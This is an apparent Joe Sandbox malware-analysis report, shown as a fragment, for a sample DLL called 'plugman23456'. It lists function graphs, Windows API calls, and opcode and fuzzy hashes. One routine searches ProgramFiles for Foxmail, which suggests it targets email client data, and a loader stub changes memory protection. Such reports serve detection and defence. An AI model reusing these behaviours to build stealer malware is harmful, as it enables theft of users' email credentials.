7703 10006368 __dosmaperr 20 API calls 7701->7703 7702->7697 7704 10008aa8 7703->7704 7705 100062ac ___std_exception_copy 26 API calls 7704->7705 7706 10008ab3 7705->7706 7706->7697 7708 10008ae3 7707->7708 7709 10008ad8 7707->7709 7711 10008aeb 7708->7711 7717 10008af4 _abort 7708->7717 7710 100056d0 21 API calls 7709->7710 7716 10008ae0 7710->7716 7714 1000571e _free 20 API calls 7711->7714 7712 10008af9 7715 10006368 __dosmaperr 20 API calls 7712->7715 7713 10008b1e RtlReAllocateHeap 7713->7716 7713->7717 7714->7716 7715->7716 7716->7699 7717->7712 7717->7713 7718 1000474f _abort 7 API calls 7717->7718 7718->7717

                          Executed Functions

                          Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                          • FindClose.KERNEL32(00000000), ref: 100011DB
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                          • String ID:
                          • API String ID: 1083526818-0
                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                          Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                            • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                            • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                            • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                            • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                            • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                          • lstrlenW.KERNEL32(?), ref: 100014C5
                          • lstrlenW.KERNEL32(?), ref: 100014E0
                          • lstrlenW.KERNEL32(?,?), ref: 1000150F
                          • lstrcatW.KERNEL32(00000000), ref: 10001521
                          • lstrlenW.KERNEL32(?,?), ref: 10001547
                          • lstrcatW.KERNEL32(00000000), ref: 10001553
                          • lstrlenW.KERNEL32(?,?), ref: 10001579
                          • lstrcatW.KERNEL32(00000000), ref: 10001585
                          • lstrlenW.KERNEL32(?,?), ref: 100015AB
                          • lstrcatW.KERNEL32(00000000), ref: 100015B7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                          • String ID: )$Foxmail$ProgramFiles
                          • API String ID: 672098462-2938083778
                          • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                          • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                          • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                          Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 54 10008821-1000883a 55 10008850-10008855 54->55 56 1000883c-1000884c call 10009341 54->56 57 10008862-10008886 MultiByteToWideChar 55->57 58 10008857-1000885f 55->58 56->55 66 1000884e 56->66 60 10008a19-10008a2c call 10002ada 57->60 61 1000888c-10008898 57->61 58->57 63 1000889a-100088ab 61->63 64 100088ec 61->64 67 100088ca-100088db call 100056d0 63->67 68 100088ad-100088bc call 1000bf20 63->68 70 100088ee-100088f0 64->70 66->55 72 10008a0e 67->72 82 100088e1 67->82 68->72 81 100088c2-100088c8 68->81 71 100088f6-10008909 MultiByteToWideChar 70->71 70->72 71->72 75 1000890f-10008921 call 10005f19 71->75 76 10008a10-10008a17 call 10008801 72->76 83 10008926-1000892a 75->83 76->60 85 100088e7-100088ea 81->85 82->85 83->72 86 10008930-10008937 83->86 85->70 87 10008971-1000897d 86->87 88 10008939-1000893e 86->88 90 100089c9 87->90 91 1000897f-10008990 87->91 88->76 89 10008944-10008946 88->89 89->72 92 1000894c-10008966 call 10005f19 89->92 93 100089cb-100089cd 90->93 94 10008992-100089a1 call 1000bf20 91->94 95 100089ab-100089bc call 100056d0 91->95 92->76 109 1000896c 92->109 98 10008a07-10008a0d call 10008801 93->98 99 100089cf-100089e8 call 10005f19 93->99 94->98 107 100089a3-100089a9 94->107 95->98 108 100089be 95->108 98->72 99->98 112 100089ea-100089f1 99->112 111 100089c4-100089c7 107->111 108->111 109->72 111->93 113 100089f3-100089f4 112->113 114 10008a2d-10008a33 112->114 115 100089f5-10008a05 WideCharToMultiByte 113->115 114->115 115->98 116 10008a35-10008a3c call 10008801 115->116 116->76
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                          • __freea.LIBCMT ref: 10008A08
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • __freea.LIBCMT ref: 10008A11
                          • __freea.LIBCMT ref: 10008A36
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                          Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 119 1000c7e6-1000c7ed GetModuleHandleA 120 1000c82d 119->120 121 1000c7ef-1000c7fe call 1000c803 119->121 123 1000c82f-1000c833 120->123 131 1000c800-1000c80b GetProcAddress 121->131 132 1000c865 121->132 125 1000c872 call 1000c877 123->125 126 1000c835-1000c83d GetModuleHandleA 123->126 129 1000c83f-1000c847 126->129 129->129 130 1000c849-1000c84c 129->130 130->123 133 1000c84e-1000c850 130->133 131->120 135 1000c80d-1000c81a VirtualProtect 131->135 134 1000c866-1000c86e 132->134 136 1000c852-1000c854 133->136 137 1000c856-1000c85e 133->137 143 1000c870 134->143 139 1000c82c 135->139 140 1000c81c-1000c82a VirtualProtect 135->140 141 1000c85f-1000c860 GetProcAddress 136->141 137->141 139->120 140->139 141->132 143->130
                          APIs
                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                            • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                          Function 1000C7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 144 1000c7a7-1000c7bc 145 1000c82d 144->145 146 1000c7be-1000c7c6 144->146 148 1000c82f-1000c833 145->148 146->145 147 1000c7c8-1000c7f6 call 1000c7e6 146->147 156 1000c7f8 147->156 157 1000c86c-1000c86e 147->157 150 1000c872 call 1000c877 148->150 151 1000c835-1000c83d GetModuleHandleA 148->151 154 1000c83f-1000c847 151->154 154->154 155 1000c849-1000c84c 154->155 155->148 158 1000c84e-1000c850 155->158 159 1000c7fa-1000c7fe 156->159 160 1000c85b-1000c85e 156->160 161 1000c870 157->161 162 1000c866-1000c86b 157->162 163 1000c852-1000c854 158->163 164 1000c856-1000c85a 158->164 167 1000c865 159->167 168 1000c800-1000c80b GetProcAddress 159->168 165 1000c85f-1000c860 GetProcAddress 160->165 161->155 162->157 163->165 164->160 165->167 167->162 168->145 169 1000c80d-1000c81a VirtualProtect 168->169 170 1000c82c 169->170 171 1000c81c-1000c82a VirtualProtect 169->171 170->145 171->170
                          APIs
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                            • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                          Function 1000C803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 172 1000c803-1000c80b GetProcAddress 173 1000c82d 172->173 174 1000c80d-1000c81a VirtualProtect 172->174 177 1000c82f-1000c833 173->177 175 1000c82c 174->175 176 1000c81c-1000c82a VirtualProtect 174->176 175->173 176->175 178 1000c872 call 1000c877 177->178 179 1000c835-1000c83d GetModuleHandleA 177->179 181 1000c83f-1000c847 179->181 181->181 182 1000c849-1000c84c 181->182 182->177 183 1000c84e-1000c850 182->183 184 1000c852-1000c854 183->184 185 1000c856-1000c85e 183->185 186 1000c85f-1000c865 GetProcAddress 184->186 185->186 189 1000c866-1000c86e 186->189 191 1000c870 189->191 191->182
                          APIs
                          • GetProcAddress.KERNEL32(00000000,1000C7F4,1000C7DD), ref: 1000C804
                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: B7F0C2619497893CFA21C7B40C45EBA5FCCCB276E0B249A56F600C718BDCA5890693FE
                          Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 192 10005ce1-10005cf5 193 10005d02-10005d1d LoadLibraryExW 192->193 194 10005cf7-10005d00 192->194 196 10005d46-10005d4c 193->196 197 10005d1f-10005d28 GetLastError 193->197 195 10005d59-10005d5b 194->195 200 10005d55 196->200 201 10005d4e-10005d4f FreeLibrary 196->201 198 10005d37 197->198 199 10005d2a-10005d35 LoadLibraryExW 197->199 202 10005d39-10005d3b 198->202 199->202 203 10005d57-10005d58 200->203 201->200 202->196 204 10005d3d-10005d44 202->204 203->195 204->203
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID:
                          • API String ID: 3177248105-0
                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                          Function 10006ACB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 205 10006acb-10006aff GetCPInfo 206 10006bf5-10006c02 205->206 207 10006b05 205->207 209 10006c08-10006c18 206->209 208 10006b07-10006b11 207->208 208->208 210 10006b13-10006b26 208->210 211 10006c24-10006c2b 209->211 212 10006c1a-10006c22 209->212 213 10006b47-10006b49 210->213 215 10006c3b 211->215 216 10006c2d-10006c34 211->216 214 10006c37-10006c39 212->214 218 10006b28-10006b2f 213->218 219 10006b4b-10006b82 call 100086e4 call 10008a3e 213->219 217 10006c3d-10006c4c 214->217 215->217 216->214 217->209 220 10006c4e-10006c5e call 10002ada 217->220 221 10006b3e-10006b40 218->221 230 10006b87-10006bb2 call 10008a3e 219->230 224 10006b31-10006b33 221->224 225 10006b42-10006b45 221->225 224->225 228 10006b35-10006b3d 224->228 225->213 228->221 233 10006bb4-10006bbe 230->233 234 10006bc0-10006bcc 233->234 235 10006bce-10006bd0 233->235 236 10006bde-10006be5 234->236 237 10006bd2-10006bd7 235->237 238 10006be7 235->238 239 10006bee-10006bf1 236->239 237->236 238->239 239->233 240 10006bf3 239->240 240->220
                          APIs
                          • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-3916222277
                          • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                          • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                          • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                          Function 10005F19 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 241 10005f19-10005f3b call 10005c45 243 10005f40-10005f47 241->243 244 10005f70-10005f8a call 10005fa1 LCMapStringW 243->244 245 10005f49-10005f6e 243->245 249 10005f90-10005f9e call 10002ada 244->249 245->249
                          APIs
                          • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 10005F8A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: String
                          • String ID: LCMapStringEx
                          • API String ID: 2568140703-3893581201
                          • Opcode ID: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction ID: 984c2aabb43d86beb2eff1d34daabde68608d0bd8f0a2971fe4c3ea005c0c61c
                          • Opcode Fuzzy Hash: 9311d150e09a2ea236c127db5a9a9399c35e1f3cdcd5bb094b510bbe54d2b48d
                          • Instruction Fuzzy Hash: 9401D332500159BBEF129F90CC05EEE7F66EF08390F018115FE1826124CB369971AB95
                          Function 10005D5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 253 10005d5c-10005d7e call 10005c45 255 10005d83-10005d8a 253->255 256 10005d9b TlsAlloc 255->256 257 10005d8c-10005d99 255->257 258 10005da1-10005daf call 10002ada 256->258 257->258
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Alloc
                          • String ID: FlsAlloc
                          • API String ID: 2773662609-671089009
                          • Opcode ID: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
                          • Opcode Fuzzy Hash: 5ade6ed448300679f83b5d20ac83fd3ad7347746afaf7e54a560ff76d56e46a0
                          • Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
                          Function 10003AF1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 263 10003af1-10003b06 call 10003a82 265 10003b0b-10003b12 263->265 266 10003b24-10003b26 TlsAlloc 265->266 267 10003b14-10003b23 265->267
                          APIs
                          • try_get_function.LIBVCRUNTIME ref: 10003B06
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: try_get_function
                          • String ID: FlsAlloc
                          • API String ID: 2742660187-671089009
                          • Opcode ID: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction ID: 0b7c7f44018c04906f4f2ef9afae3f4f684564eee465a9a4c05fe82f6616737e
                          • Opcode Fuzzy Hash: e5392f9aa55551a50589cb99c6148b67437594651e03cd2756b54b563a9e1daf
                          • Instruction Fuzzy Hash: 13D02B32744138B3F201B3A06C04BEEBB88D7025F2F040063FB4C5210CDB11591042E6
                          Function 10006E20 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 270 10006e20-10006e44 call 100069f3 273 10006e54-10006e5b 270->273 274 10006e46-10006e4f call 10006a66 270->274 276 10006e5e-10006e64 273->276 281 10007001-10007010 call 10002ada 274->281 278 10006f54-10006f73 call 10002c40 276->278 279 10006e6a-10006e76 276->279 288 10006f76-10006f7b 278->288 279->276 282 10006e78-10006e7e 279->282 285 10006e84-10006e8a 282->285 286 10006f4c-10006f4f 282->286 285->286 290 10006e90-10006e9c IsValidCodePage 285->290 287 10007000 286->287 287->281 291 10006fb2-10006fbc 288->291 292 10006f7d-10006f82 288->292 290->286 293 10006ea2-10006eaf GetCPInfo 290->293 291->288 298 10006fbe-10006fe5 call 100069b5 291->298 294 10006f84-10006f8a 292->294 295 10006faf 292->295 296 10006eb5-10006ed6 call 10002c40 293->296 297 10006f39-10006f3f 293->297 299 10006fa3-10006fa5 294->299 295->291 308 10006ed8-10006edf 296->308 309 10006f29 296->309 297->286 301 10006f41-10006f47 call 10006a66 297->301 311 10006fe6-10006ff5 298->311 304 10006fa7-10006fad 299->304 305 10006f8c-10006f92 299->305 315 10006ffd-10006ffe 301->315 304->292 304->295 305->304 312 10006f94-10006f9f 305->312 313 10006ee1-10006ee6 308->313 314 10006f02-10006f05 308->314 317 10006f2c-10006f34 309->317 311->311 316 10006ff7-10006ff8 call 10006acb 311->316 312->299 313->314 318 10006ee8-10006eee 313->318 320 10006f0a-10006f11 314->320 315->287 316->315 317->316 321 10006ef6-10006ef8 318->321 320->320 322 10006f13-10006f27 call 100069b5 320->322 323 10006ef0-10006ef5 321->323 324 10006efa-10006f00 321->324 322->317 323->321 324->313 324->314
                          APIs
                            • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                          • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: CodeInfoPageValid
                          • String ID:
                          • API String ID: 546120528-0
                          • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                          • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                          • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                          Function 10006C5F Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
